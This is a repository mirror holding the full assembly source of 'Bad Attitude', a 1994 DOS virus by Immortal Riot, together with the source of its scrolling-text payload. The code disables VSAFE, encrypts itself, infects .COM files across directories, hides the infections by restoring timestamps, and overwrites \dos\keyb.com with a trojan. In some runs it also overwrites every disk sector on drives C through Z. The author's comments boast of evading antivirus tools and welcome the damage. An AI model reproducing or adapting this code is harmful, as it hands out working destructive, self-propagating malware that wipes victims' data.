mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-30 06:55:27 +00:00
412 lines
8.3 KiB
NASM
412 lines
8.3 KiB
NASM
; -Bad Attitude-
|
||
; "Created by Immortal Riot's destructive development team"
|
||
; (c) '94 The Unforgiven/Immortal Riot
|
||
;
|
||
; "If I don't have bad attitude, this virus is harmless"
|
||
;
|
||
; Notes:
|
||
; F-Prot, Scan, Tbav, Findviru can't find shits of this virus.
|
||
;
|
||
; Disclaimer:
|
||
; If this virus damages you, it's a pleasure, but not the fault
|
||
; of the author. If you want to sue me, it's your loss.
|
||
;
|
||
; Dedication:
|
||
; I dedicate this virus to all virus writers worldwide!
|
||
|
||
.MODEL TINY
|
||
.CODE
|
||
ORG 100h
|
||
|
||
Virus_start:
|
||
xchg ax,ax
|
||
xchg ax,ax ; Take down VSAFE from memory!
|
||
mov ax,0fa01h
|
||
mov dx,5945h
|
||
int 16h
|
||
|
||
call get_delta_offset
|
||
real_start:
|
||
|
||
Get_delta_offset: ; Get delta offset
|
||
pop bp
|
||
sub bp, offset get_delta_offset
|
||
|
||
Call_en_de_crypt:
|
||
mov ax,bp
|
||
add ax,11Ah
|
||
push ax
|
||
jmp short en_de_crypt ; First, decrypt the virus
|
||
jmp short real_code_start ; and then, continue!
|
||
|
||
encryption_value dw 0 ; Random value for each infection!
|
||
|
||
Write_virus:
|
||
call en_de_crypt ; Encrypt the virus
|
||
mov ah,40h
|
||
mov cx, offset virus_end-100h
|
||
lea dx, [bp+100h]
|
||
int 21h
|
||
call en_de_crypt ; Decrypt the virus again
|
||
ret
|
||
|
||
En_de_crypt:
|
||
mov ax,word ptr [bp+encryption_value]
|
||
lea si,[bp+real_code_start]
|
||
mov cx,(virus_end-real_code_start+1)/2
|
||
|
||
Xor_LoopY:
|
||
xor word ptr [si],ax
|
||
inc si
|
||
inc si
|
||
Loop Xor_LoopY
|
||
ret
|
||
|
||
Real_code_start:
|
||
mov ah,2ch ; Get Time
|
||
int 21h
|
||
cmp dl,0 ; 1%
|
||
jne Another_Percent
|
||
call Create_file
|
||
|
||
Another_Percent:
|
||
cmp dl,1 ; another %
|
||
jne not_this_time ; Naaaaaaah
|
||
|
||
mov ah,09h ; Print the virus name
|
||
lea dx,[bp+virus]
|
||
int 21h
|
||
|
||
Trash_sucker: ; Overwrite all sectors on all drives!
|
||
mov al,2h ; on drive C - Z
|
||
Drive:
|
||
mov cx,1
|
||
lea bx,virus
|
||
cwd
|
||
Next_Sector:
|
||
int 26h
|
||
inc dx
|
||
jnc next_sector
|
||
inc al
|
||
jmp short drive
|
||
|
||
Not_this_time:
|
||
cld
|
||
Set_Dta: ; Set the dta
|
||
mov ah,1ah
|
||
lea dx,[bp+virus_end]
|
||
int 21h
|
||
|
||
Buffer_Xfer: ; Restore the beginning
|
||
lea si,[bp+first_bytes]
|
||
lea di,[bp+@buf]
|
||
mov cx,2
|
||
rep movsw
|
||
|
||
mov di,3 ; Infection-counter
|
||
|
||
Get_drive: ; Get drive from where we're
|
||
mov ah,19h ; executed from
|
||
int 21h
|
||
|
||
cmp al,2
|
||
jae Get_Dir ; A: or B:, if so, don't infect
|
||
jmp restore_start ; other programs! Just return normally!
|
||
|
||
Get_dir: ; Get directory from we're executed
|
||
mov ah,47h ; from!
|
||
xor dl,dl
|
||
lea si,[bp+dirbuf+1]
|
||
int 21h
|
||
|
||
Find_First: ; Find first file
|
||
mov cx,111b
|
||
lea dx,[bp+filemask]
|
||
mov ah,4eh
|
||
_4fh: ; When called ah=4fh
|
||
int 21h
|
||
|
||
jnc clear_file_attribs ; We did find a file!
|
||
|
||
chdir: ; We didn't find a file,
|
||
cmp byte ptr [bp+DOSflag],1
|
||
jne dot_dott
|
||
jmp no_more_files
|
||
|
||
dot_dott:
|
||
mov ah,3bh ; so we try in another dir!
|
||
lea dx,[bp+offset dot_dot]
|
||
int 21h
|
||
jnc find_first
|
||
|
||
mov ah,3bh ; We try to infect files in
|
||
lea dx,[bp+offset DOS] ; \DOS
|
||
int 21h
|
||
inc byte ptr [bp+dosflag]
|
||
|
||
jnc find_first
|
||
jmp no_more_files
|
||
|
||
Clear_file_attribs: ; Clear file attribs
|
||
mov ax,4301h
|
||
sub cx,cx
|
||
lea dx,[bp+virus_end+1eh]
|
||
int 21h
|
||
|
||
Open_file: ; Open the file in read/write mode!
|
||
mov ax,3d02h
|
||
int 21h
|
||
xchg ax,bx
|
||
|
||
Read_file: ; Red the first four bytes of the file
|
||
mov ah,3fh
|
||
mov cx,4
|
||
lea dx,[bp+first_bytes]
|
||
int 21h
|
||
|
||
Check_already_infected: ; and check if it's already infected
|
||
|
||
mov si,dx
|
||
lea si,[bp+first_bytes]
|
||
cmp word ptr [si],0e990h
|
||
je already_infected
|
||
|
||
cmp word ptr [si],5a4dh ; or an EXE file?
|
||
je already_infected
|
||
cmp word ptr [si],4d5ah ; or an EXE file?
|
||
je already_infected
|
||
|
||
mov ax,word ptr [bp+virus_end+1ah] ; or smaller than 400 bytes?
|
||
cmp ax,400
|
||
jb already_infected
|
||
cmp ax,64000 ; or bigger than 64000 bytes?
|
||
ja already_infected ; if so, don't infect <20>m!
|
||
|
||
Move_file_pointer_2_EOF:
|
||
|
||
call F_Ptr ; Move file-pointer to end of file
|
||
sub ax,4 ; take the last four bytes
|
||
|
||
Fill_1st_buf:
|
||
mov word ptr [bp+Istbuf],0e990h ; Fill the four bytes
|
||
mov word ptr [bp+Istbuf+2],ax ; with our own jmp-constrution!
|
||
|
||
_TopOfFile: ; Move file-pointer to
|
||
mov ax,4200h ; the beginning of file!
|
||
int 21h
|
||
|
||
Write_first4: ; Write our own jump instruction
|
||
mov ah,40h
|
||
mov cx,4
|
||
lea dx,[bp+Istbuf]
|
||
int 21h
|
||
|
||
_EOF: ; Move to end of file again
|
||
call F_Ptr
|
||
|
||
Get_random: ; Get a random value
|
||
mov ah,2ch
|
||
int 21h
|
||
add dl, dh
|
||
|
||
jz get_random
|
||
mov word ptr [bp+encryption_value],dx ; put it as the encryption value
|
||
call write_virus ; infect the file
|
||
|
||
jmp short restore_time_date ; Then cover our tracks!
|
||
|
||
Already_infected:
|
||
inc di
|
||
|
||
Restore_Time_Date: ; Restore the infected file time
|
||
lea si,[bp+virus_end+16h] ; and date stamps
|
||
mov cx,word ptr [si]
|
||
mov dx,word ptr [si+2]
|
||
mov ax,5701h
|
||
int 21h
|
||
|
||
Close_file: ; Close the file!
|
||
mov ah,3eh
|
||
int 21h
|
||
|
||
Set_old_attrib: ; Set back old attribs!
|
||
mov ax,4301h
|
||
xor ch,ch
|
||
mov cl,byte ptr [bp+virus_end+15h]
|
||
lea dx,[bp+virus_end+1eh]
|
||
int 21h
|
||
|
||
Enough_files: ; Have we infected
|
||
dec di ; 3 files this run?
|
||
cmp di,0
|
||
je no_more_files
|
||
|
||
mov ah,4fh ; No, then, search for the next file!
|
||
jmp _4fh
|
||
|
||
No_more_files: ; We've infected enough!
|
||
Restore_start:
|
||
lea si,[bp+@buf]
|
||
mov di,100h
|
||
movsw
|
||
movsw
|
||
|
||
Restore_dir: ; Restore the directory to
|
||
lea dx,[bp+dirbuf] ; from where we were
|
||
mov ah,3bh ; executed from!
|
||
int 21h
|
||
|
||
Exit_proc: ; and then return to the
|
||
mov bx,100h ; real-file!
|
||
push bx
|
||
xor ax,ax
|
||
retn
|
||
|
||
F_Ptr: ; Move the file-pointer to end of
|
||
mov ax,4202h ; file! (used twice!)
|
||
xor cx, cx
|
||
xor dx, dx
|
||
int 21h
|
||
ret
|
||
|
||
Create_file: ; Create a new \dos\keyb.com
|
||
Mov ah,3ch
|
||
mov cx,0
|
||
lea dx,[bp+filename]
|
||
int 21h
|
||
|
||
Write_Da_File:
|
||
xchg ax,bx
|
||
mov ah,64d
|
||
mov cx,len
|
||
lea dx,[bp+scroll] ; Write new content in the file
|
||
int 21h
|
||
|
||
Close_Da_File: ; Close the trojanized file
|
||
mov ah,3eh
|
||
int 21h
|
||
ret ; and continue..
|
||
|
||
scroll db "<22><>$<0F><03>R<><52>2Ҵ<02><10>O<00><00>",1ah," <09>"
|
||
scrol1 db " <20>Q<>8",0ffh,"<22><>Y<EFBFBD><02>z<01>!<21>{<01>!<21>|<01>!<21>}<01>!<21>~<01>!<21><01>!<21><16><01>!<21><16><01>!<21> <20>!<21><16><01>!<21><16><01>!<21><16><01>!<21><16><01>!<21> <20>!O<><4F>ImmortalRiot "
|
||
len equ $-scroll
|
||
|
||
virus db '[BAD ATTITUDE!]$'
|
||
copy db "(c) '94 The Unforgiven/Immortal Riot"
|
||
|
||
Filemask db '*.COM',0
|
||
Dot_dot db '..',0
|
||
dos db '\dos',0
|
||
|
||
filename db '\dos\keyb.com',0
|
||
Buffers:
|
||
First_bytes db 90h,90h,50h,0c3h ; Our own little jmp constrution!
|
||
|
||
|
||
@buf db 4 dup(0) ; Empty space to be
|
||
Istbuf db 4 dup(0) ; filled with instructions
|
||
DIRBUF db "\"
|
||
Junkie:
|
||
db 64 DUP(0)
|
||
dosflag db 0
|
||
virus_end:
|
||
end virus_start
|
||
; ------------------------------------------------------------------------------
|
||
; Here is the nice pay-load (read:scroll) in the Bad Attitude virus.
|
||
|
||
.model tiny
|
||
.code
|
||
org 100h
|
||
Ssscroll:
|
||
mov al,dl
|
||
and al,15
|
||
|
||
mov ah,3
|
||
int 10h
|
||
push dx
|
||
|
||
mov dh,al
|
||
xor dl,dl
|
||
|
||
mov ah,2
|
||
int 10h
|
||
|
||
mov di,79
|
||
mov cx,1
|
||
|
||
arrow:
|
||
mov ax,91Ah
|
||
|
||
mov bl,10
|
||
int 10h
|
||
|
||
DELAY:
|
||
push cx
|
||
mov cx,-200
|
||
rep lodsb
|
||
pop cx
|
||
|
||
mov ah,2
|
||
|
||
mov dl, I
|
||
int 21h
|
||
|
||
mov dl, M
|
||
int 21h
|
||
|
||
mov dl, M2
|
||
int 21h
|
||
|
||
mov dl, O
|
||
int 21h
|
||
|
||
mov dl, R
|
||
int 21h
|
||
|
||
mov dl, T
|
||
int 21h
|
||
|
||
mov dl, A
|
||
int 21h
|
||
|
||
mov dl, L
|
||
int 21h
|
||
|
||
Space:
|
||
mov dl, ' '
|
||
int 21h
|
||
|
||
mov dl, R2
|
||
int 21h
|
||
|
||
mov dl, I2
|
||
int 21h
|
||
|
||
mov dl, O2
|
||
int 21h
|
||
|
||
mov dl, T2
|
||
int 21h
|
||
|
||
mov dl,' '
|
||
int 21h
|
||
dec di
|
||
jmp arrow ; Loop until a ctrl+break is pressed!
|
||
|
||
heap:
|
||
I db 'I' ; Immortal Riot
|
||
M db 'm'
|
||
M2 db 'm'
|
||
o db 'o'
|
||
R db 'r'
|
||
T db 't'
|
||
A db 'a'
|
||
L db 'l'
|
||
|
||
R2 db 'R'
|
||
I2 db 'i'
|
||
O2 DB 'o'
|
||
T2 DB 't' ; Is here to stay!
|
||
a13 db ' '
|
||
|
||
end Ssscroll |